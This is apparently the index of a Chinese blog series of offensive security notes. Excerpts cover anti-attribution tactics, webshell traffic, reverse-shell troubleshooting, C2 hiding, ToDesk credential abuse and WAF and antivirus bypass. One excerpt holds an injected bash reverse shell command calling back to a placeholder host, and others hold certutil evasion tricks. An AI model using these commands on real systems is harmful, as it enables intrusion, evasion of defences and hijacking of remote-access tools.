合集-攻防杂记
防溯源总结
摘要:防溯源 参考文章:https://mp.weixin.qq.com/s/OXJYBd0bKbauSsi7ia5IDA 基本是在参考文章里摘抄总结出来的个人笔记。 总结: 1、使用识别蜜罐插件 2、指纹浏览器(无痕浏览器)或者独立浏览器,防止JSONP蜜罐溯源 3、挂代理,防止出口ip被溯源 4、尽量
常见webshell管理工具流量分析
摘要:1.蚁剑 蚁剑设置代理后bp抓包,bp看流量方便一点 默认编码器流量分析 进入文件管理器的两个数据包: 解码后的数据为: 7=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};f
反弹shell不成功排查
摘要:反弹不成功排查 今天遇到shell反弹不成功的问题,顺便记下来 0.低权限环境 /tmp写入bash反弹脚本执行 127.0.0.1| Echo ‘bash -i >& /dev/tcp/x.x.x.x/7777 0>&1’>/tmp/1.sh 127.0.0.1|bash /tmp/1.sh ph
c2隐藏&流量加密
摘要:c2隐藏&流量加密 参考链接 参考文章: https://webxxe.cn/index.php/archives/238/ c2profile随机生成脚本: https://github.com/threatexpress/random_c2_profile https://github.com/
todesk利用上线
摘要:翻出todesk的配置文件config.ini 看到clientId就是设备代码,tempAuthPassEx就是临时密码加密后,我们把受害机的tempAuthPassEx复制到本机的todesk配置文件,保存后,重新打开todesk 注意:更新频率得改成手动 重新打开todesk就会发现我们的临时
proxifier+v2代理软件实现真全局代理(防溯源)
摘要:v2的使用这里就不详细说了 打开v2,右下角可以看到端口 开启v2代理后,打开proxifer 先打开左上角的代理服务器 按照以下配置,端口改成v2上面看到的socks5端口 也可以左下角检查以下代理有没有问题,有时候可能是代理服务器卡了或者死了 接着来到代理规则,按照以下配置
远程下载上传命令(绕过大小限制)
摘要:远程下载上传命令(绕过大小限制) python起http服务 python3 -m http.server 5003 python2 -m SimpleHTTPServer 5003 上传时遇到限制上传大小时: 编码base64:certutil -encode yb.exe 1.txt 可以把1.
命令执行绕过
摘要:命令执行绕过 前言:仅提供一些绕过思路,对于较为敏感的命令基本已经失效了 1、多空一格 2、^混淆 certutil -url^cache 3、拷贝文件名 copy C:\Windows\System32\certutil.exe xx.exe 之前绕过火绒添加用户案例 copy c:\window
sqlserver下利用sqlps.exe白名单绕杀软
摘要:sqlserver下利用sqlps.exe白名单绕杀软 前言: 在一次攻防里通过sqlserver盲注拿到一个执行命令权限,但是由于是盲注回显很有问题以及有杀软,所以利用起来非常难受而且拿不到webshell或者上线c2,所以才找到这个方法。 介绍: sqlps.exe是SQL Server附带的一
bypass waf测试_rce
摘要:前言 以下验证绕过效果都使用开源雷池waf 知己知彼百战百胜,想bypass waf还是得先了解waf waf是什么 WAF(WebApplicationFirewall,WEB应用防火墙)会过滤和监测 Web 应用程序与互联网之间的 HTTP/HTTPS 流量,以此来保护 Web 应用程序安全。它
bypass 安全狗宝塔waf测试_sql注入
摘要:a、关键词替换 混淆 注释/**/和内联注释/!/的利用 注释和内联注释被拦截,可以在注释和内敛注释里添加其他字符增加混淆效果,结合bp爆破找到可绕过的字符,每处地方可能可绕过的字符串都可能不一样,有些语句/////可以绕过,有些语句不可以,得换成//////,所以这时候需要爆破出此处可绕过的字符串